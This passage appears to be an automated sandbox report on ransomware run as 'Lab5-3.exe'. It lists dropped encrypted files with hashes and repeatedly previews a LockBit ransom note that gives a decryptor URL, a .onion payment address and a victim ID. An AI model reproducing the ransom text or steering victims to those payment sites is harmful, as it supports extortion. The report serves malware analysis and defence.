                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17408
                                                                                                          Entropy (8bit):7.988433130005466
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:j4+uXV5VAggP2EAKw1D7+SvNJ/rXBoObKAv4du++SXMHuirqMtb:jFuhAggP8H1DXrxhbKAv4/+SXMHuirqw
                                                                                                          MD5:E29A3CDDE4F6DBD6BECAD27B0A739E51
                                                                                                          SHA1:D231CE87C1AB7CB3793259A72516BD5B4EA75C64
                                                                                                          SHA-256:A049F1F60E10530FC393B7E8E57F4BF526DD2DAEEC975C98403B21355D14F879
                                                                                                          SHA-512:BC7E3AEC8AAE3A80A0E24BF7F3D65A1607397B74F8852080FC1AE330A4EDECFFE7094E85E8AC2BAD7A0850DE7A8E392C46E0B0334A4FAE473FE5542B91A350CB
                                                                                                          Malicious:false
                                                                                                          Preview:T.]..N.O......7.o.*..cY,..Q...1.G6...A...f.oY.0(...-.\(.).B4$aj.@@o...|..8...5c....0*a.wO..1..e...q....A...Jr#.$..>...C.}...8o...z...c...{.}.;.z..yE...:B(.P-.........!..)}..Q.9.ZE..2......_.E..h..a.D...Be...KFM..M.."...........R...4.....=.{.0..rh....S.F.!.I...}...vx|..Q..5v.!|0.Y..". ..q.4S..]..........&0tT..i...<...7`..U.|......"{............L.......t..z...h.EiH....Q...sq....F..).`.'..j3.....$P.{..l..H...r...d.......y%.l.y.........%....9.i.......gr......../.)r....8v.N.M...P.^..!a.)..K...L..D..V.3m.?...3...oQ...R-.u..B.H.......N.:....[..OT..Xa.|..../7.F/`.."w.....}@....V...y....Vg-....4..EZ..4....._......?.'......W..@.*_9.;Fz.=fR9+...+.ERj$t..~$........Q.V...X...E(.[..I.P.Q...D....y...H...5.T.'.4..^a.D.. ..|....%%[..y.b6(..ae.9...e..<.(.'.%...t..,..J(...d.!.d@V*\.J...w.H.].(~.f.K].......-.l's2fP..Y.R.....u...LY..[...g.tX............)V..rN../..=;..\.{.X0.j...=................Oct...../...S.tt...PF...=9|{z.Mf......T..,.9.~.)A..d.!...%S.s....Z?J
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16464
                                                                                                          Entropy (8bit):7.988916790172183
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Mwe0l1Vo0pTIMwKGx/ApRPRATan4FN9k7Vl8PrfSVXbL/2wjqwtb:Mw1lU0pEhIpRZf4Fw7VSoLL2wjdZ
                                                                                                          MD5:921DBC1C6CF24A2188C5701ACC3D31BF
                                                                                                          SHA1:71BAD5EACAEFBB0E2AB293FF3CFAA06D3D5ABA5E
                                                                                                          SHA-256:134ACAD2CA1EAA20AA0DD7C81145BB5A72DDBFB147B78C2163FBD6DD5DC0DFC2
                                                                                                          SHA-512:481D96598B8F57E50C816AC17EE2EABD352EAEB4BA86F45A5C09E22BFD4A2EBF9FCCF841C68946258D22D3FACFFBCDA33014318E5E65B75B5836AE425340FE23
                                                                                                          Malicious:false
                                                                                                          Preview:MYmV.....r....)Y.;G.oP.C.sz.0.*.B*Pw.....g"l.y..7........Q....<......7...}...Y`.fq..v+...`........:.....HPAZ-..]....@...........c].L.A......t-0.T...?!.H......n.P...Dy.B....<.'...%..l.....h2.J..o4...$W.....A6.,.l.m..P.....j7..#6.l&.}.q}....f......k"..q....zU....N..p..e.....n.(w..gW..&.I......'...U...=n.&t.U;.g5......._.$....~:...,;*.Jd.R ...M.r...%.....$........XM.R...t.....,.I...8..D..k'4[4..,.....j...........(4..N.b`^...Y.[.Df........Uk.h>...~..8..c.+....9*.c!.F.....M)A..Qn~bZ.. .pE}.M...Z..i9.V...Y.".{.....<.90..{..a*..G?... zkw.#.^.hH..%...w.. ...s\....#zS<.....\p.@4.a...t.....%/.meL..7.bAj...C......0d.x.T....8.d2....YX\.V.P{dI.........t....H...c......[.H........x......F.J.q.....5'....W.H,..^....1....;.>.."..y.K..xq.w.v...3.... .......@.w.7..|...o_.......:6.(...(.<OYO.%0 .[%S..C8"..j8.V.9...'...).k.....".u.D_........U....A_..|B.pW9n......&..............U.!..!M`t$.l.....:/|Bh...v(..!..'ai.m..'..w.......+...........u,H..$....W.B..q{...`&....8:.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17056
                                                                                                          Entropy (8bit):7.988273149919608
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:OJxjAfEgNf/I2gH4YLIcYHQ2jQ4rGB0MKcTlD8CoXZGAY9tb:OJdkNf/5gH4QIcYFE4CGM8CoXZGv9Z
                                                                                                          MD5:BFB925648508E09D9B4265B9F010046D
                                                                                                          SHA1:8A9D819308E666EDC7255B39C854F543536485D2
                                                                                                          SHA-256:298C79CA2B1C76A9CA23E366025FB1E926536C0C2F896279B140ADF51EF50C5D
                                                                                                          SHA-512:0E394BDEAE4B703636A556509D0F31D330C47F7DCBF59990254AAE674CB8EDFC40440566E89DB387329F72E87806596F57A66F06D6E4E9498ED7187DFEA4DBC3
                                                                                                          Malicious:false
                                                                                                          Preview:7.>.~.E.b...~..V.p......B...'..{....W.....I>e.HOyY..e.x....*.......x.]N5O.....W:.n2Z5..\...)...T.i..N....$jM..y.G+p/../zK...T.........+'.E^ls.7.!N.E!.......R.?.....r.W..j8:...v.8~"..1....3...~D.L.2u....A;.9.,.[...a......7.......R.r...^.t.......P.T....x.....!#C....../...Y.8.V.XX9....6....C'i3......k.R..>=..c...%..<.:..E..VC...4.Z.z..J.\.v..A.$..".O.$....VG.D..,..?..}?.$]..#.(.=.om.`aHM.@I..sf.....#&t,8........w2.......*...!....BF;<P..^!..D.......I.ib{....=..-.?.-9}..1Q./..c?qa..[..Z].y3k...^.....>oA..o...o.1..z.3....m....l..2...Wu...G..'.E0g.N..!M.`..G....q..8.r:......6..l......r.B..?..(I.....#.....o.ANM._5.pn.{.3."^.-IS..?..*". b.hX.........R...M?i{g...n@K...)...l..H..)/#]7..V!..i(.p...j....L. .V..y.L..Llfe.[O.F#..|....UDIH.B=P.".........YF<.%p..m\....(......8..D.(.M...".. ...u#].N.*...>..j.n.1.<...'./.........|G......,g+...u2".....Q[T.w.7.......+{6....@.T....@.....".e.R..C...Xb.$.BY..y.x.S:..L,.....}.'T").61....lU.l....DB..*.....4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:SysEx File - Mesosha
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18192
                                                                                                          Entropy (8bit):7.990361456930825
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:yQUeOkjViQkMw9y5HZX6nQ37y7ZoXQRtb:DukBNkR9AXSC7i5Z
                                                                                                          MD5:EA0292D62CB47A012925C0FCBE060E74
                                                                                                          SHA1:49B73FEDDD18E560F678DCB09FCF059AEAB601CA
                                                                                                          SHA-256:7EC4FC4ABB8C53B21502111466F54ACB03AA8DFA207B8735389CE01EBF699CB3
                                                                                                          SHA-512:612CF2B6899683E31068CC50D708DE40EBE2241BA5FC2C6A95EF42977DB3DECC3A28C3B1FD89371A0B3EA81EFD908DEAB604BED853EB963E206E70F4946C46E0
                                                                                                          Malicious:true
                                                                                                          Preview:.I..$.Zt} .S.S.q3...&E@W...S.B.G,....*\.....L./....YO..Z;.z.....~^...2.v^).QB....i%.[..E..(..,.q^.........*..v w+@.-.z.5.Pixl7CoX6>.g{...^'.PR.D.*..L.....-..2...8~.W.....K.B..:.T.....k.E...~~....Q..A.5l../....L...1 :...."..5...K."...=....6}Y..rT...~.#.9...I.o...iQ"B.+..~...zf..TTr.L%.i..n.aTj.".....P.{...e,..[{`.0.~7...T*...5q)....O.K2...t.S;...6....Y...+.,..UK..x.].....M.F.K..*.4.8;.`........UO. Z.i6.0s....3q>.a..qw.=TZQ.......BO...F..VD......2e........ g..5!.Qy...m.7...;....\....&m.B.dP.>#....&._.:_ZA...s.y....gp.F....Y.i.....K....v. .M....N8oO3q...z.e.,...W2..;.F.kv..`;.V5W.<5..}...S..Y....:-...WI8..G.@6..V.j.%.RdD..}.........8... ...`.H.A..\GL.0v^.A.PZ..X..5]=.s,_I.+X...~....w..j..4o3.5.t.\..*............./.(.uL...w....4E.....i.,.*..V.f..P....t..f4.2!#r ..E.da.o........nP...a".i-..}%g.EGL...Tg...d.T...`}.nG.t...!G..+ch..T;7..~..JD.....m.F[VX.0c...^.r.2..'.!..+.cb...2.p..Kk.!*....V... ./.....G...U.4#.'.K.b...D.....@.L.8>.3'{`.%G0.j.+.L.f.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16704
                                                                                                          Entropy (8bit):7.988418039080417
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:mkUWllfrcTw6Mkwz181FhocrNt91L9dOS0DwxZurrNrZHSFw28tb:hhrck6MEjhnNtD2SyCuDHSFw3Z
                                                                                                          MD5:C2BBB2659E58ED75DDD5F4C17A5CB05A
                                                                                                          SHA1:1128821B87BA8E7DE79E697CBA6AA7A5E32D3CD9
                                                                                                          SHA-256:C1F6DB11777183577F8A7953EDDD78613A48550D3B980D6D25B5DD4D5994A0FD
                                                                                                          SHA-512:385E5A37E0E8A3EA3FBAF96819F843E553A1F1234DDD1D6BBB0E90EB4C8F688A951D16D5373F451632F7D13E106EB33EFB421112E39CE1B131A2EC39CD8788C7
                                                                                                          Malicious:false
                                                                                                          Preview:..Q$,..;...dZ..2..9...9m..i{.cg.&y..eNz..;y/..2..[..M.|..(..%..Kw.}..R..'.nad?....*\...jK.".9..G.2E.P,.....\.].J.U.. ........d_V._.w{...WH.u.C.x)`.aE..hgH....^.w...81..1.Y...<g..`+... ...B.....?=. .....[..|.[.&&&.z..$.2..L$...&w.)...W.......97....9..i&.U....m.~.....E....B...}....j.w..D*&.A.r..`.%....p.I.[o.G.1..42~. ....p..@.MqP....U..2.)K|...C.}.Z.z......'.y..V..dZ:. ......y.Ob.K."Yp...H:e.*.....o..8F7.&]...w..K.@....X...RD.PCE'..,.S....Z..6.6....;.?/.Y~.^1.....h..e....'o..SU.....FFCP....E......*.y..[hd...Q.?.J[..Uw..7.....R`.....A......{.w:GI.C....._.L.LM.J....i5g.]....m1.)......$.]5..9.f.$-Z....5.._'.'...k...G._...O...n?*..cqu.|..q.g.".D.....'....O-.K. .3..<.....c.TO.b..#...!...P.>....C..a......Dt..+.r..`...)..E/..I9.31.liQ..........V....._.r...u..$.......P;.4.......*E.N^J\.......2..4.G5..-6....A.5...n......?.......1.b.<.g.}.*....3.}.x..>.F".i*..3/=(.4..L(uI.\.j.?.... .(.y~....`.X..<.~..U'.X...jz....R.p.B..#M....0.;..5S.T..e-.Re....~-a2.^.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17360
                                                                                                          Entropy (8bit):7.988989614944448
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:e/FFMP45JWfUK1cl27crTy0TTwLP+PVmQgbPA7DF/xz5Cjeoqtb:e/FFMTfBo7eHWPVm1KZz5CKZ
                                                                                                          MD5:27030F8697E02DE9A95B20E8EC0B3E58
                                                                                                          SHA1:CA91BDB263C00834DA5B3B2EF02852BA3D75A9E5
                                                                                                          SHA-256:C19FC65A6FC414298CDE17B45E36729ACFC1AA2AD5A0E1A779311D6E7F814ACB
                                                                                                          SHA-512:34560F0D8B5113758BE1AE11146CC0B55F636FDC39BC183EC5E532B92F683196630A4C209826413CBB68B80CB0983BEA7E185FC016597393B8D197CB95083009
                                                                                                          Malicious:false
                                                                                                          Preview:.......e..:.....}........hY.{E.P.u.}7.yS...8.!..aj.C|.6..~.].>..?....G...]D.t$.._.t..b....(.K...y........ !z...%.z....t..<1....'|k.....;c..T......]@b.%...Q.1..w.....b&....0.G../=.o{..4p.+.......1..h....~8..U\J{*.."a...GhX*.T9...?..x.JB4.|na..)N.....}......,...l(....m\+$'...EYh.(n.)..R....0& UB....F...B....F.(y...E8L......c...qG.fw........l.....i.o6.....a..S^...u....,.....pud...4qG&....W-..&.?.G*.1..~..]I....3.:.S....l#)............@x-.....cY.B+.%...;.[."./W.5.....N.bD..I ...U.+u"e..;....2|6..+-..'.ba0......-}.n..ODi.=.ao..W...h....4.%.f..|... vY...........)..........x{Y..G.wFw.g..cc....b;...........@.m.....8..x.`.gu........:..^..(}.:.C\=.'0....N.?....4.....}...[.] ..\._s..[...H.U!.`.N.<.w..Z.6..w..d.....[..H......8.WNy3Y..[...9G.P..B.(7.m..^....W..kO.1\w..~..u{...b.x...s.5........Nr.'.9g..q.A.#)........9..m........Y.7%.C........]....r.4...R...5....`.v.J..~..3.O..d.v.[T....a.d..NgF....0'...q..x1..6.N..C4..<.B.$.......A...{...{;..y./x,.CN...7N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17152
                                                                                                          Entropy (8bit):7.989455811986801
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:qSLzzqxrzq90Ho1eZD+ZZ4oEPZ+tCB0qPmTcunNhITCeytb:qSLzzqZu90BZMGoknPOrwTcZ
                                                                                                          MD5:B3486234D3BD1B053926FDACC87520BA
                                                                                                          SHA1:DDB9035E962B23F6900C70205F081D8AAE7EA533
                                                                                                          SHA-256:82DBF8EB7AAC3E11BBD60CF0117B77068B2DC8B48C429E47EEB88C9463740442
                                                                                                          SHA-512:E5CBF1A0A9C6DC2A76367645C8B3C607CDBEF8559EB094A13E634E8A5CC2E195B6BE2D4F1B8799FC2828997D9D6C0F530797139EB8809D134C3896494A584065
                                                                                                          Malicious:false
                                                                                                          Preview:.sh;..+.R.A..e}..A.8...T'......l...jz.G.F5..v./...g...m....:P..[3.;..B.8!.A2.aj......L..../q.'..E._.VAu. ......*.[{*...3LDc..R. .$...n.^a3...<T.ySAw..k.U....~.|..|.2Y..8.p.+.....H..H.c..lq.dr?...6.p.Q......p....&2.....0*dk...(Q-..m8@..lj...L...Q..y..X.....S."I..........qF.0%...........G./..%=A%YL&..%Lb.Ln...e..Z2..5.....:;.......=$..\.d....D&..W&.C)...Z.$.w.{...`c0p .F...5.+./.=.. ..A;.6d.5H..[.FfKag...R......V..j..h.{M...7.f....3..tN..tL.`...?k.!....|.q"..=F.E.8...7v.,A/....p9.*.8........uH}4..Z.\.FY}...(.u..X./.#c..l.9...F./y..\...Kq.......3....c....c.'E.z2..S.ZK..{.`....|+..R.3}M...|.|8|..h.....=.B......y...........k....0.'.[B{.>.s.T.<?.#m5....R...`.*..?. 3....j.......u|.w2.4.;.....s"......(bL..%.P.+.....w.C//..)..!..T..S.H.2.La!..C._..z...QG...f.p.*..6..J........z.h...y...43.e.............*..W7.C..P..W.....4..i.M6R......(..i..!b.u.^....e(+.`.v87.......4B..6{..!..d.|Tp...Fb........~./..s...Y..v5...c..R...^..l..,..0yy\".wq..S,`4.w....4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19648
                                                                                                          Entropy (8bit):7.989278625722797
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:2lLKmR91ojoFO1TZfAa/kNPmKrbwMQIkOxeKSQaTQFwNRh+WwQBkpHtb:GKaIT+kgwMQIhebQ/FwNRYWwIIZ
                                                                                                          MD5:461EC7467BC21A639A035C96621A2274
                                                                                                          SHA1:1CE3C29644CF496E9E4271B657262535B2322B30
                                                                                                          SHA-256:3BF24B765122A32567F52BC03FDB519274F6ED0D05EB1A419EF4A5175A7D7D18
                                                                                                          SHA-512:42AC4061433EB3242DBEB7F95B3D2A17BA6242CF43101B812223E465E229B64DC0CC696194714C719B400477AA4E756D160A2D9144B7D5CED83CAC000C7FD55A
                                                                                                          Malicious:false
